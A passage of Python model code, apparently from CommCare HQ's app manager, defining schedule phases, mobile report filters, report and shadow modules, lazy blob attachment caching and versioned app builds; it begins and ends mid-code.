            ('case_long', self.case_details.long, True),
            ('product_short', self.product_details.short, self.get_app().commtrack_enabled),
            ('product_long', self.product_details.long, False),
        ]
        if module_offers_search(self) and not self.case_details.short.custom_xml:
            details.append(('search_short', self.search_detail, True))
        return details
    @property
    def validator(self):
        return AdvancedModuleValidator(self)
    def _uses_case_type(self, case_type, invert_match=False):
        return any(form.uses_case_type(case_type, invert_match) for form in self.forms)
    def uses_usercase(self):
        """Return True if this module has any forms that use the usercase.
        """
        return self._uses_case_type(USERCASE_TYPE)
    @property
    def phase_anchors(self):
        return [phase.anchor for phase in self.schedule_phases]
    def get_or_create_schedule_phase(self, anchor):
        """Returns a tuple of (phase, new?)"""
        if anchor is None or anchor.strip() == '':
            raise ScheduleError(_("You can't create a phase without an anchor property"))
        phase = next((phase for phase in self.get_schedule_phases() if phase.anchor == anchor), None)
        is_new_phase = False
        if phase is None:
            self.schedule_phases.append(SchedulePhase(anchor=anchor))
            # TODO: is there a better way of doing this?
            phase = list(self.get_schedule_phases())[-1]  # get the phase from the module so we know the _parent
            is_new_phase = True
        return (phase, is_new_phase)
    def _clear_schedule_phases(self):
        self.schedule_phases = []
    def update_schedule_phases(self, anchors):
        """ Take a list of anchors, reorders, deletes and creates phases from it """
        old_phases = {phase.anchor: phase for phase in self.get_schedule_phases()}
        self._clear_schedule_phases()
        for anchor in anchors:
            try:
                self.schedule_phases.append(old_phases.pop(anchor))
            except KeyError:
                self.get_or_create_schedule_phase(anchor)
        # Deleting a phase that still has forms attached is an error.
        deleted_phases_with_forms = [anchor for anchor, phase in six.iteritems(old_phases) if len(phase.forms)]
        if deleted_phases_with_forms:
            raise ScheduleError(_("You can't delete phases with anchors "
                                  "{phase_anchors} because they have forms attached to them").format(
                phase_anchors=(", ").join(deleted_phases_with_forms)))
        return self.get_schedule_phases()
    def update_schedule_phase_anchors(self, new_anchors):
        """ takes a list of tuples (id, new_anchor) and updates the phase anchors """
        for anchor in new_anchors:
            # SchedulePhase.id is 1-indexed; convert to a list index.
            id = anchor[0] - 1
            new_anchor = anchor[1]
            try:
                list(self.get_schedule_phases())[id].change_anchor(new_anchor)
            except IndexError:
                pass  # That phase wasn't found, so we can't change its anchor. Ignore it
    def update_app_case_meta(self, meta):
        """Register this module's case detail columns with the app case metadata."""
        for column in self.case_details.long.columns:
            meta.add_property_detail('long', self.case_type, self.unique_id, column)
        for column in self.case_details.short.columns:
            meta.add_property_detail('short', self.case_type, self.unique_id, column)
class ReportAppFilter(DocumentSchema):
    """Base class for mobile report filters; wrap dispatches on doc_type."""
    @classmethod
    def wrap(cls, data):
        # Polymorphic wrap: only dispatch when called on the base class.
        if cls is ReportAppFilter:
            return get_report_filter_class_for_doc_type(data['doc_type']).wrap(data)
        else:
            return super(ReportAppFilter, cls).wrap(data)
    def get_filter_value(self, user, ui_filter):
        # Subclasses must compute the concrete filter value for this user.
        raise NotImplementedError
MobileFilterConfig = namedtuple('MobileFilterConfig', ['doc_type', 'filter_class', 'short_description'])


def get_all_mobile_filter_configs():
    """Return the registry of mobile report filter types.

    Each entry maps a couch ``doc_type`` to its filter class and a
    human-readable description shown in the app builder UI.
    """
    return [
        MobileFilterConfig('AutoFilter', AutoFilter, _('Value equal to a standard user property')),
        MobileFilterConfig('CustomDataAutoFilter', CustomDataAutoFilter,
                           _('Value equal to a custom user property')),
        MobileFilterConfig('StaticChoiceFilter', StaticChoiceFilter, _('An exact match of a constant value')),
        MobileFilterConfig('StaticChoiceListFilter', StaticChoiceListFilter,
                           _('An exact match of a dynamic property')),
        MobileFilterConfig('StaticDatespanFilter', StaticDatespanFilter, _('A standard date range')),
        MobileFilterConfig('CustomDatespanFilter', CustomDatespanFilter, _('A custom range relative to today')),
        # Fixed: description previously had an unclosed parenthesis.
        MobileFilterConfig('CustomMonthFilter', CustomMonthFilter,
                           _("Custom Month Filter (you probably don't want this)")),
        MobileFilterConfig('MobileSelectFilter', MobileSelectFilter, _('Show choices on mobile device')),
        MobileFilterConfig('AncestorLocationTypeFilter', AncestorLocationTypeFilter,
                           _("Ancestor location of the user's assigned location of a particular type")),
        MobileFilterConfig('NumericFilter', NumericFilter, _('A numeric expression')),
    ]
def get_report_filter_class_for_doc_type(doc_type):
    """Look up the ReportAppFilter subclass registered for ``doc_type``.

    Raises ValueError when the doc_type is unknown; the registry is expected
    to contain exactly one entry per doc_type.
    """
    matches = [
        config.filter_class
        for config in get_all_mobile_filter_configs()
        if config.doc_type == doc_type
    ]
    if not matches:
        raise ValueError('Unexpected doc_type for ReportAppFilter', doc_type)
    assert len(matches) == 1
    return matches[0]
def _filter_by_case_sharing_group_id(user, ui_filter):
    """One Choice per case-sharing group the user belongs to."""
    from corehq.apps.reports_core.filters import Choice
    groups = user.get_case_sharing_groups()
    return [Choice(value=group._id, display=None) for group in groups]
def _filter_by_location_id(user, ui_filter):
    """Filter on the user's primary assigned location id."""
    filter_kwargs = {ui_filter.name: user.location_id, 'request_user': user}
    return ui_filter.value(**filter_kwargs)
def _filter_by_location_ids(user, ui_filter):
    """Filter on all of the user's assigned locations, delimiter-joined."""
    from corehq.apps.userreports.reports.filters.values import CHOICE_DELIMITER
    joined_ids = CHOICE_DELIMITER.join(user.assigned_location_ids)
    return ui_filter.value(**{ui_filter.name: joined_ids, 'request_user': user})
def _filter_by_username(user, ui_filter):
    """Filter on the user's raw username."""
    from corehq.apps.reports_core.filters import Choice
    username = user.raw_username
    return Choice(value=username, display=None)
def _filter_by_user_id(user, ui_filter):
    """Filter on the user's document id."""
    from corehq.apps.reports_core.filters import Choice
    user_id = user._id
    return Choice(value=user_id, display=None)
def _filter_by_parent_location_id(user, ui_filter):
    """Filter on the parent of the user's assigned location (None if no parent)."""
    location = user.sql_location
    if location and location.parent:
        parent_id = location.parent.location_id
    else:
        parent_id = None
    return ui_filter.value(**{ui_filter.name: parent_id, 'request_user': user})
# (slug, function computing the value from the restore user, description)
AutoFilterConfig = namedtuple('AutoFilterConfig', ['slug', 'filter_function', 'short_description'])
def get_auto_filter_configurations():
    """Return an AutoFilterConfig for every supported auto-filter slug."""
    specs = [
        ('case_sharing_group', _filter_by_case_sharing_group_id,
         _("The user's case sharing group")),
        ('location_id', _filter_by_location_id, _("The user's assigned location")),
        ('location_ids', _filter_by_location_ids, _("All of the user's assigned locations")),
        ('parent_location_id', _filter_by_parent_location_id,
         _("The parent location of the user's assigned location")),
        ('username', _filter_by_username, _("The user's username")),
        ('user_id', _filter_by_user_id, _("The user's ID")),
    ]
    return [AutoFilterConfig(*spec) for spec in specs]
def _get_auto_filter_function(slug):
    """Return the filter function registered under *slug*.

    Raises ValueError for an unknown slug.
    """
    matches = [config.filter_function
               for config in get_auto_filter_configurations()
               if config.slug == slug]
    if not matches:
        raise ValueError('Unexpected ID for AutoFilter', slug)
    assert len(matches) == 1
    return matches[0]
class AutoFilter(ReportAppFilter):
    """Filter whose value is derived automatically from a standard user property."""
    # One of the slugs from get_auto_filter_configurations().
    filter_type = StringProperty(choices=[f.slug for f in get_auto_filter_configurations()])

    def get_filter_value(self, user, ui_filter):
        filter_function = _get_auto_filter_function(self.filter_type)
        return filter_function(user, ui_filter)
class CustomDataAutoFilter(ReportAppFilter):
    """Filter whose value comes from a custom user-data property."""
    # Key into user.user_data; KeyError if the user lacks it.
    custom_data_property = StringProperty()

    def get_filter_value(self, user, ui_filter):
        from corehq.apps.reports_core.filters import Choice
        property_value = user.user_data[self.custom_data_property]
        return Choice(value=property_value, display=None)
class StaticChoiceFilter(ReportAppFilter):
    """Always filters on a single constant value, regardless of the user."""
    # The constant value to match.
    select_value = StringProperty()

    def get_filter_value(self, user, ui_filter):
        from corehq.apps.reports_core.filters import Choice
        choice = Choice(value=self.select_value, display=None)
        return [choice]
class StaticChoiceListFilter(ReportAppFilter):
    """Filters on a fixed list of constant values."""
    value = StringListProperty()

    def get_filter_value(self, user, ui_filter):
        from corehq.apps.reports_core.filters import Choice
        choices = []
        for string_value in self.value:
            choices.append(Choice(value=string_value, display=None))
        return choices
class StaticDatespanFilter(ReportAppFilter):
    """Filter on one of the standard named date ranges (e.g. "last 30 days")."""
    date_range = StringProperty(
        choices=[choice.slug for choice in get_simple_dateranges()],
        required=True,
    )

    def get_filter_value(self, user, ui_filter):
        # Resolve the named range to concrete dates at request time.
        start_date, end_date = get_daterange_start_end_dates(self.date_range)
        return DateSpan(startdate=start_date, enddate=end_date)
class CustomDatespanFilter(ReportAppFilter):
    """Date range filter defined relative to "today" in the domain's timezone.

    ``date_number`` (and ``date_number2`` for the ``between`` operator) are
    day counts stored as strings; the range is computed by subtracting them
    from today.
    """
    operator = StringProperty(
        choices=[
            '=',
            '<=',
            '>=',
            '>',
            '<',
            'between'
        ],
        required=True,
    )
    # Number of days back from today (stored as a string).
    date_number = StringProperty(required=True)
    # Second day count; only used when operator == 'between'.
    date_number2 = StringProperty()
    def get_filter_value(self, user, ui_filter):
        assert user is not None, (
            "CustomDatespanFilter.get_filter_value must be called "
            "with an OTARestoreUser object, not None")
        # "today" is computed in the domain's timezone, not server UTC.
        timezone = get_timezone_for_domain(user.domain)
        today = ServerTime(datetime.datetime.utcnow()).user_time(timezone).done().date()
        start_date = end_date = None
        days = int(self.date_number)
        if self.operator == 'between':
            days2 = int(self.date_number2)
            # allows user to have specified the two numbers in either order
            if days > days2:
                end = days2
                start = days
            else:
                start = days2
                end = days
            # larger day count means further back in time, hence the start
            start_date = today - datetime.timedelta(days=start)
            end_date = today - datetime.timedelta(days=end)
        elif self.operator == '=':
            start_date = end_date = today - datetime.timedelta(days=days)
        elif self.operator == '>=':
            # at least `days` ago: open-ended start, bounded end
            start_date = None
            end_date = today - datetime.timedelta(days=days)
        elif self.operator == '<=':
            # at most `days` ago: bounded start, open-ended end
            start_date = today - datetime.timedelta(days=days)
            end_date = None
        elif self.operator == '<':
            # strict inequality: shift the boundary by one day
            start_date = today - datetime.timedelta(days=days - 1)
            end_date = None
        elif self.operator == '>':
            # strict inequality: shift the boundary by one day
            start_date = None
            end_date = today - datetime.timedelta(days=days + 1)
        return DateSpan(startdate=start_date, enddate=end_date)
def is_lte(integer):
    """Build a validator rejecting values greater than *integer*."""
    def validate(x):
        if x > integer:
            raise BadValueError('Value must be less than or equal to {}'.format(integer))
    return validate
def is_gte(integer):
    """Build a validator rejecting values smaller than *integer*."""
    def validate(x):
        if x < integer:
            raise BadValueError('Value must be greater than or equal to {}'.format(integer))
    return validate
class CustomMonthFilter(ReportAppFilter):
    """
    Filter by months that start on a day number other than 1

    A "month" here runs from ``start_of_month`` to the day before the next
    month's ``start_of_month``; ``period`` selects how many such months to
    go back from the current one.

    See [FB 215656](http://manage.dimagi.com/default.asp?215656)
    """
    # Values for start_of_month < 1 specify the number of days from the end of the month. Values capped at
    # len(February).
    start_of_month = IntegerProperty(
        required=True,
        validators=(is_gte(-27), is_lte(28))
    )
    # DateSpan to return i.t.o. number of months to go back
    period = IntegerProperty(
        default=DEFAULT_MONTH_FILTER_PERIOD_LENGTH,
        validators=(is_gte(0),)
    )
    @classmethod
    def wrap(cls, doc):
        # Coerce legacy string values to ints before schema validation.
        doc['start_of_month'] = int(doc['start_of_month'])
        if 'period' in doc:
            doc['period'] = int(doc['period'] or DEFAULT_MONTH_FILTER_PERIOD_LENGTH)
        return super(CustomMonthFilter, cls).wrap(doc)
    def get_filter_value(self, user, ui_filter):
        def get_last_month(this_month):
            # First of this_month minus one day = last day of the previous month.
            return datetime.date(this_month.year, this_month.month, 1) - datetime.timedelta(days=1)
        def get_last_day(date):
            # Number of days in date's month.
            _, last_day = calendar.monthrange(date.year, date.month)
            return last_day
        start_of_month = int(self.start_of_month)
        today = datetime.date.today()
        if start_of_month > 0:
            start_day = start_of_month
        else:
            # start_of_month is zero or negative. Work backwards from the end of the month
            start_day = get_last_day(today) + start_of_month
        # Loop over months backwards for period > 0
        month = today if today.day >= start_day else get_last_month(today)
        for i in range(int(self.period)):
            month = get_last_month(month)
        if start_of_month > 0:
            start_date = datetime.date(month.year, month.month, start_day)
            # NOTE(review): this gives a span of len(start month) days, not
            # "day before start_day of next month" — confirm intended.
            days = get_last_day(start_date) - 1
            end_date = start_date + datetime.timedelta(days=days)
        else:
            # Recompute the start day relative to the selected month's length.
            start_day = get_last_day(month) + start_of_month
            start_date = datetime.date(month.year, month.month, start_day)
            next_month = datetime.date(month.year, month.month, get_last_day(month)) + datetime.timedelta(days=1)
            end_day = get_last_day(next_month) + start_of_month - 1
            end_date = datetime.date(next_month.year, next_month.month, end_day)
        return DateSpan(startdate=start_date, enddate=end_date)
class MobileSelectFilter(ReportAppFilter):
    """Let the mobile user choose the filter value on the device."""

    def get_filter_value(self, user, ui_filter):
        # No value is computed at sync time.
        return None
class AncestorLocationTypeFilter(ReportAppFilter):
    """Filter on the id of the user's location's ancestor of a given type."""
    # Name of the location type of the desired ancestor (e.g. "district").
    ancestor_location_type_name = StringProperty()
    def get_filter_value(self, user, ui_filter):
        from corehq.apps.locations.models import SQLLocation
        from corehq.apps.reports_core.filters import REQUEST_USER_KEY
        kwargs = {REQUEST_USER_KEY: user}
        try:
            ancestor = user.sql_location.get_ancestors(include_self=True).\
                get(location_type__name=self.ancestor_location_type_name)
            kwargs[ui_filter.name] = ancestor.location_id
        except (AttributeError, SQLLocation.DoesNotExist):
            # user.sql_location is None, or location does not have an ancestor of that type
            pass
        # With no matching ancestor, the filter is evaluated without a value.
        return ui_filter.value(**kwargs)
class NumericFilter(ReportAppFilter):
    """Filter comparing a numeric report column against a constant operand."""
    # FIX: the original declaration ended with a stray trailing comma, which
    # made ``operator`` a 1-tuple *containing* a StringProperty rather than a
    # schema property — so the choices were never validated and reading
    # ``self.operator`` on a doc without the key returned the tuple.
    operator = StringProperty(choices=['=', '!=', '<', '<=', '>', '>='])
    operand = FloatProperty()

    @classmethod
    def wrap(cls, doc):
        # Coerce legacy string operands to float before schema validation.
        doc['operand'] = float(doc['operand'])
        return super(NumericFilter, cls).wrap(doc)

    def get_filter_value(self, user, ui_filter):
        return {
            'operator': self.operator,
            'operand': self.operand,
        }
class ReportAppConfig(DocumentSchema):
    """
    Class for configuring how a user configurable report shows up in an app
    """
    # ID of the ReportConfiguration
    report_id = StringProperty(required=True)
    header = DictProperty()
    localized_description = DictProperty()
    # XPath expression evaluated on the phone to produce the description.
    xpath_description = StringProperty()
    use_xpath_description = BooleanProperty(default=False)
    show_data_table = BooleanProperty(default=True)
    complete_graph_configs = DictProperty(GraphConfiguration)
    # Maps report filter slugs to their ReportAppFilter configuration.
    filters = SchemaDictProperty(ReportAppFilter)
    # Unique ID of this mobile report config
    uuid = StringProperty(required=True)
    report_slug = StringProperty(required=False)  # optional, user-provided
    sync_delay = DecimalProperty(default=0.0)  # in hours
    # Per-instance cache for report(); see below.
    _report = None
    def __init__(self, *args, **kwargs):
        super(ReportAppConfig, self).__init__(*args, **kwargs)
        # Auto-assign an id so every config is addressable from the suite.
        if not self.uuid:
            self.uuid = uuid.uuid4().hex
    @classmethod
    def wrap(cls, doc):
        # for backwards compatibility with apps that have localized or xpath descriptions
        old_description = doc.get('description')
        if old_description:
            if isinstance(old_description, six.string_types) and not doc.get('xpath_description'):
                soft_assert_type_text(old_description)
                doc['xpath_description'] = old_description
            elif isinstance(old_description, dict) and not doc.get('localized_description'):
                doc['localized_description'] = old_description
        if not doc.get('xpath_description'):
            # default to an xpath expression evaluating to the empty string
            doc['xpath_description'] = '""'
        return super(ReportAppConfig, cls).wrap(doc)
    def report(self, domain):
        # Lazily fetch and cache the backing ReportConfiguration.
        if self._report is None:
            from corehq.apps.userreports.models import get_report_config
            self._report = get_report_config(self.report_id, domain)[0]
        return self._report
    @property
    def instance_id(self):
        # Prefer the human-readable slug when one was provided.
        return self.report_slug or self.uuid
class ReportModule(ModuleBase):
    """
    Module for user configurable reports
    """
    module_type = 'report'
    # Mobile report configs shown in this module.
    report_configs = SchemaListProperty(ReportAppConfig)
    # Report modules have no forms of their own.
    forms = []
    _loaded = False
    put_in_root = False
    @property
    @memoized
    def reports(self):
        # ReportConfigurations backing this module's report configs.
        from corehq.apps.userreports.models import get_report_configs
        return get_report_configs([r.report_id for r in self.report_configs], self.get_app().domain)
    @classmethod
    def new_module(cls, name, lang):
        module = ReportModule(
            name={(lang or 'en'): name or ugettext("Reports")},
            case_type='',
        )
        module.get_or_create_unique_id()
        return module
    def get_details(self):
        from corehq.apps.app_manager.suite_xml.features.mobile_ucr import ReportModuleSuiteHelper
        return ReportModuleSuiteHelper(self).get_details()
    def get_custom_entries(self):
        from corehq.apps.app_manager.suite_xml.features.mobile_ucr import ReportModuleSuiteHelper
        return ReportModuleSuiteHelper(self).get_custom_entries()
    def get_menus(self, supports_module_filter=False):
        """Yield the localized suite menu for this module."""
        kwargs = {}
        if supports_module_filter:
            kwargs['relevant'] = interpolate_xpath(self.module_filter)
        menu = suite_models.LocalizedMenu(
            id=id_strings.menu_id(self),
            menu_locale_id=id_strings.module_locale(self),
            media_image=bool(len(self.all_image_paths())),
            media_audio=bool(len(self.all_audio_paths())),
            image_locale_id=id_strings.module_icon_locale(self),
            audio_locale_id=id_strings.module_audio_locale(self),
            **kwargs
        )
        # One command per configured report.
        menu.commands.extend([
            suite_models.Command(id=id_strings.report_command(config.uuid))
            for config in self.report_configs
        ])
        yield menu
    def check_report_validity(self):
        """
        returns is_valid, valid_report_configs
        If any report doesn't exist, is_valid is False, otherwise True
        valid_report_configs is a list of all report configs that refer to existing reports
        """
        try:
            all_report_ids = [report._id for report in self.reports]
            valid_report_configs = [report_config for report_config in self.report_configs
                                    if report_config.report_id in all_report_ids]
            is_valid = (len(valid_report_configs) == len(self.report_configs))
        except ReportConfigurationNotFoundError:
            valid_report_configs = []  # assuming that if one report is in a different domain, they all are
            is_valid = False
        return namedtuple('ReportConfigValidity', 'is_valid valid_report_configs')(
            is_valid=is_valid,
            valid_report_configs=valid_report_configs
        )
    @property
    def validator(self):
        return ReportModuleValidator(self)
class ShadowModule(ModuleBase, ModuleDetailsMixin):
    """
    A module that acts as a shortcut to another module. This module has its own
    settings (name, icon/audio, filter, etc.) and its own case list/detail, but
    inherits case type and forms from its source module.
    """
    module_type = 'shadow'
    # Unique id of the module this shadow points at.
    source_module_id = StringProperty()
    forms = []
    # Ids of source-module forms to hide in this shadow.
    excluded_form_ids = SchemaListProperty()
    case_details = SchemaProperty(DetailPair)
    ref_details = SchemaProperty(DetailPair)
    case_list = SchemaProperty(CaseList)
    referral_list = SchemaProperty(CaseList)
    task_list = SchemaProperty(CaseList)
    parent_select = SchemaProperty(ParentSelect)
    search_config = SchemaProperty(CaseSearch)
    get_forms = IndexedSchema.Getter('forms')
    @classmethod
    def wrap(cls, data):
        data = cls.wrap_details(data)
        return super(ShadowModule, cls).wrap(data)
    @property
    def source_module(self):
        # The module this shadow mirrors, or None if unset or not found.
        if self.source_module_id:
            try:
                return self._parent.get_module_by_unique_id(self.source_module_id)
            except ModuleNotFoundException:
                pass
        return None
    @property
    def case_type(self):
        # Inherited from the source module.
        if not self.source_module:
            return None
        return self.source_module.case_type
    @property
    def requires(self):
        if not self.source_module:
            return 'none'
        return self.source_module.requires
    @property
    def root_module_id(self):
        if not self.source_module:
            return None
        return self.source_module.root_module_id
    def get_suite_forms(self):
        # Source module's forms, minus the explicitly excluded ones.
        if not self.source_module:
            return []
        return [f for f in self.source_module.get_forms() if f.unique_id not in self.excluded_form_ids]
    @parse_int([1])
    def get_form(self, i):
        # Shadow modules have no forms of their own.
        return None
    def requires_case_details(self):
        if not self.source_module:
            return False
        return self.source_module.requires_case_details()
    def get_case_types(self):
        if not self.source_module:
            return []
        return self.source_module.get_case_types()
    @memoized
    def get_subcase_types(self):
        if not self.source_module:
            return []
        return self.source_module.get_subcase_types()
    @memoized
    def all_forms_require_a_case(self):
        if not self.source_module:
            return []
        return self.source_module.all_forms_require_a_case()
    @classmethod
    def new_module(cls, name, lang):
        """Create a new ShadowModule with a default "Name" case detail column."""
        lang = lang or 'en'
        detail = Detail(
            columns=[DetailColumn(
                format='plain',
                header={(lang or 'en'): ugettext("Name")},
                field='name',
                model='case',
            )]
        )
        module = ShadowModule(
            name={(lang or 'en'): name or ugettext("Untitled Module")},
            case_details=DetailPair(
                short=Detail(detail.to_json()),
                long=Detail(detail.to_json()),
            ),
        )
        module.get_or_create_unique_id()
        return module
    @property
    def validator(self):
        return ShadowModuleValidator(self)
class LazyBlobDoc(BlobMixin):
    """LazyAttachmentDoc for blob db
    Cache blobs in local memory (for this request)
    and in django cache (for the next few requests)
    and commit to couchdb.
    See also `dimagi.utils.couch.lazy_attachment_doc.LazyAttachmentDoc`
    Cache strategy:
    - on fetch, check in local memory, then cache
    - if both are a miss, fetch from couchdb and store in both
    - after an attachment is committed to the blob db and the
      save has succeeded, save the attachment in the cache
    """
    def __init__(self, *args, **kwargs):
        super(LazyBlobDoc, self).__init__(*args, **kwargs)
        # Attachments queued via lazy_put_attachment, flushed on save().
        self._LAZY_ATTACHMENTS = {}
        # to cache fetched attachments
        # these we do *not* send back down upon save
        self._LAZY_ATTACHMENTS_CACHE = {}
    @classmethod
    def wrap(cls, data):
        if "_attachments" in data:
            data = data.copy()
            attachments = data.pop("_attachments").copy()
            if cls._migrating_blobs_from_couch:
                # preserve stubs so couch attachments don't get deleted on save
                stubs = {}
                for name, value in list(attachments.items()):
                    if isinstance(value, dict) and "stub" in value:
                        stubs[name] = attachments.pop(name)
                if stubs:
                    data["_attachments"] = stubs
        else:
            attachments = None
        self = super(LazyBlobDoc, cls).wrap(data)
        if attachments:
            # Re-queue inline (non-stub) attachment content lazily.
            for name, attachment in attachments.items():
                if isinstance(attachment, six.text_type):
                    attachment = attachment.encode('utf-8')
                if isinstance(attachment, bytes):
                    info = {"content": attachment}
                else:
                    raise ValueError("Unknown attachment format: {!r}"
                                     .format(attachment))
                self.lazy_put_attachment(name=name, **info)
        return self
    def __attachment_cache_key(self, name):
        # Django cache key, scoped by document id.
        return 'lazy_attachment/{id}/{name}'.format(id=self.get_id, name=name)
    def __set_cached_attachment(self, name, content, timeout=60*60*24):
        # Write through to both the django cache and the request-local cache.
        cache.set(self.__attachment_cache_key(name), content, timeout=timeout)
        self._LAZY_ATTACHMENTS_CACHE[name] = content
    def __get_cached_attachment(self, name):
        try:
            # it has been fetched already during this request
            content = self._LAZY_ATTACHMENTS_CACHE[name]
        except KeyError:
            content = cache.get(self.__attachment_cache_key(name))
            if content is not None:
                if isinstance(content, six.text_type):
                    # legacy cache entries may hold text; normalize to bytes
                    _soft_assert(False, 'cached attachment has type unicode')
                    content = content.encode('utf-8')
                self._LAZY_ATTACHMENTS_CACHE[name] = content
        return content
    def put_attachment(self, content, name=None, *args, **kw):
        # Invalidate both cache layers before writing new content.
        cache.delete(self.__attachment_cache_key(name))
        self._LAZY_ATTACHMENTS_CACHE.pop(name, None)
        return super(LazyBlobDoc, self).put_attachment(content, name, *args, **kw)
    def has_attachment(self, name):
        return name in self.lazy_list_attachments()
    def lazy_put_attachment(self, content, name=None, content_type=None,
                            content_length=None):
        """
        Ensure the attachment is available through lazy_fetch_attachment
        and that upon self.save(), the attachments are put to the doc as well
        """
        self._LAZY_ATTACHMENTS[name] = {
            'content': content,
            'content_type': content_type,
            'content_length': content_length,
        }
    def lazy_fetch_attachment(self, name):
        # it has been put/lazy-put already during this request
        if name in self._LAZY_ATTACHMENTS:
            content = self._LAZY_ATTACHMENTS[name]['content']
        else:
            content = self.__get_cached_attachment(name)
            if content is None:
                try:
                    content = self.fetch_attachment(name, return_bytes=True)
                except ResourceNotFound as e:
                    # django cache will pickle this exception for you
                    # but e.response isn't picklable
                    if hasattr(e, 'response'):
                        del e.response
                    content = e
                    # cache the miss briefly so repeat lookups skip couch
                    self.__set_cached_attachment(name, content, timeout=60*5)
                    raise
                else:
                    self.__set_cached_attachment(name, content)
        if isinstance(content, ResourceNotFound):
            # a cached miss from an earlier request
            raise content
        return content
    def lazy_list_attachments(self):
        # Union of queued-but-unsaved attachments and committed blobs.
        keys = set()
        keys.update(getattr(self, '_LAZY_ATTACHMENTS', None) or {})
        keys.update(self.blobs or {})
        return keys
    def save(self, **params):
        def super_save():
            super(LazyBlobDoc, self).save(**params)
        if self._LAZY_ATTACHMENTS:
            # atomic_blobs (from BlobMixin) commits queued attachments
            # together with the doc save.
            with self.atomic_blobs(super_save):
                for name, info in self._LAZY_ATTACHMENTS.items():
                    if not info['content_type']:
                        info['content_type'] = ';'.join(filter(None, guess_type(name)))
                    super(LazyBlobDoc, self).put_attachment(name=name, **info)
            # super_save() has succeeded by now
            for name, info in self._LAZY_ATTACHMENTS.items():
                self.__set_cached_attachment(name, info['content'])
            self._LAZY_ATTACHMENTS.clear()
        else:
            super_save()
class VersionedDoc(LazyBlobDoc):
    """
    A document that keeps an auto-incrementing version number, knows how to make copies of itself,
    delete a copy of itself, and revert back to an earlier copy of itself.
    """
    domain = StringProperty()
    # Id of the doc this is a copy (build) of; None on the master doc.
    copy_of = StringProperty()
    version = IntegerProperty()
    short_url = StringProperty()
    short_odk_url = StringProperty()
    short_odk_media_url = StringProperty()
    # Fields stripped out when exporting/importing app source.
    _meta_fields = ['_id', '_rev', 'domain', 'copy_of', 'version', 'short_url', 'short_odk_url', 'short_odk_media_url']
    @property
    def id(self):
        return self._id
    @property
    def master_id(self):
        """Return the ID of the 'master' app. For app builds this is the ID
        of the app they were built from otherwise it's just the app's ID."""
        return self.copy_of or self._id
    def save(self, response_json=None, increment_version=None, **params):
        # Builds (copy_of set) and linked apps keep their version fixed.
        if increment_version is None:
            increment_version = not self.copy_of and self.doc_type != 'LinkedApplication'
        if increment_version:
            self.version = self.version + 1 if self.version else 1
        super(VersionedDoc, self).save(**params)
        if response_json is not None:
            if 'update' not in response_json:
                response_json['update'] = {}
            response_json['update']['app-version'] = self.version
    def make_build(self):
        """Return an (unsaved) copy of this doc to serve as a build,
        reusing an existing saved copy of this exact version if one exists.
        Must be called on a master doc, not on a build."""
        assert self.get_id
        assert self.copy_of is None
        cls = self.__class__
        copies = cls.view('app_manager/applications', key=[self.domain, self._id, self.version], include_docs=True, limit=1).all()
        if copies:
            copy = copies[0]
        else:
            copy = deepcopy(self.to_json())
            # strip identity and per-doc-only fields before re-wrapping
            bad_keys = ('_id', '_rev', '_attachments', 'external_blobs',
                        'short_url', 'short_odk_url', 'short_odk_media_url', 'recipients')
            for bad_key in bad_keys:
                if bad_key in copy:
                    del copy[bad_key]
            copy = cls.wrap(copy)
            copy['copy_of'] = self._id
            copy.copy_attachments(self)
        return copy
    def copy_attachments(self, other, regexp=ATTACHMENT_REGEX):
        # Lazily copy all of other's attachments whose names match regexp
        # (regexp=None copies everything).
        for name in other.lazy_list_attachments() or {}:
            if regexp is None or re.match(regexp, name):
                self.lazy_put_attachment(other.lazy_fetch_attachment(name), name)
    def make_reversion_to_copy(self, copy):
        """
        Replaces couch doc with a copy of the backup ("copy").
        Returns another Application/RemoteApp referring to this
        updated couch doc. The returned doc should be used in place of
        the original doc, i.e. should be called as follows:
        app = app.make_reversion_to_copy(copy)
        app.save()
        """
        if copy.copy_of != self._id:
            raise VersioningError("%s is not a copy of %s" % (copy, self))
        app = deepcopy(copy.to_json())
        # keep this doc's identity and (current) version; it is a master again
        app['_rev'] = self._rev
        app['_id'] = self._id
        app['version'] = self.version
        app['copy_of'] = None
        app.pop('_attachments', None)
        app.pop('external_blobs', None)
        cls = self.__class__
        app = cls.wrap(app)
        app.copy_attachments(copy)
        return app
    def delete_copy(self, copy):
        if copy.copy_of != self._id:
            raise VersioningError("%s is not a copy of %s" % (copy, self))
        copy.delete_app()
        # save the deletion without bumping the build's version
        copy.save(increment_version=False)
    def scrub_source(self, source):
        """
        To be overridden.
        Use this to scrub out anything
        that should be shown in the
        application source, such as ids, etc.
        """
        return source
    def export_json(self, dump_json=True):
        """Serialize this doc (meta fields removed) for export/import."""
        source = deepcopy(self.to_json())
        for field in self._meta_fields:
            if field in source:
                del source[field]
        _attachments = self.get_attachments()
        # the '_attachments' value is a dict of `name: blob_content`
        # pairs, and is part of the exported (serialized) app interface
        source['_attachments'] = _attachments
        source.pop("external_blobs", None)
        source = self.scrub_source(source)
        return json.dumps(source) if dump_json else source
    def get_attachments(self):
        attachments = {}
        for name in self.lazy_list_attachments():
            if re.match(ATTACHMENT_REGEX, name):
                # FIXME loss of metadata (content type, etc.)
                attachments[name] = self.lazy_fetch_attachment(name)
        return attachments
    def save_attachments(self, attachments, save=None):
        with self.atomic_blobs(save=save):
            for name, attachment in attachments.items():
                if re.match(ATTACHMENT_REGEX, name):
                    self.put_attachment(attachment, name)
        return self
    @classmethod
    def from_source(cls, source, domain):
        """Inverse of export_json: wrap exported source into *domain*."""
        for field in cls._meta_fields:
            if field in source:
                del source[field]
        source['domain'] = domain
        app = cls.wrap(source)
        return app
    def is_deleted(self):
        return self.doc_type.endswith(DELETED_SUFFIX)
    def unretire(self):
        # Restore the pre-deletion doc_type and persist.
        self.doc_type = self.get_doc_type()
        self.save()
    def get_doc_type(self):
        # doc_type without the deleted suffix, if present.
        if self.doc_type.endswith(DELETED_SUFFIX):
            return self.doc_type[:-len(DELETED_SUFFIX)]
        else:
            return self.doc_type
def absolute_url_property(method):
    """
    Helper for the various fully qualified application URLs
    Turns a method returning an unqualified URL
    into a property returning a fully qualified URL
    (e.g., '/my_url/' => 'https://www.commcarehq.org/my_url/')
    Expects `self.url_base` to be fully qualified url base
    """
    @wraps(method)
    def _absolute(self):
        return "{}{}".format(self.url_base, method(self))
    return property(_absolute)
class BuildProfile(DocumentSchema):
    """A named language/practice-worker profile for an app build."""
    name = StringProperty()
    langs = StringListProperty()
    practice_mobile_worker_id = StringProperty()

    def __eq__(self, other):
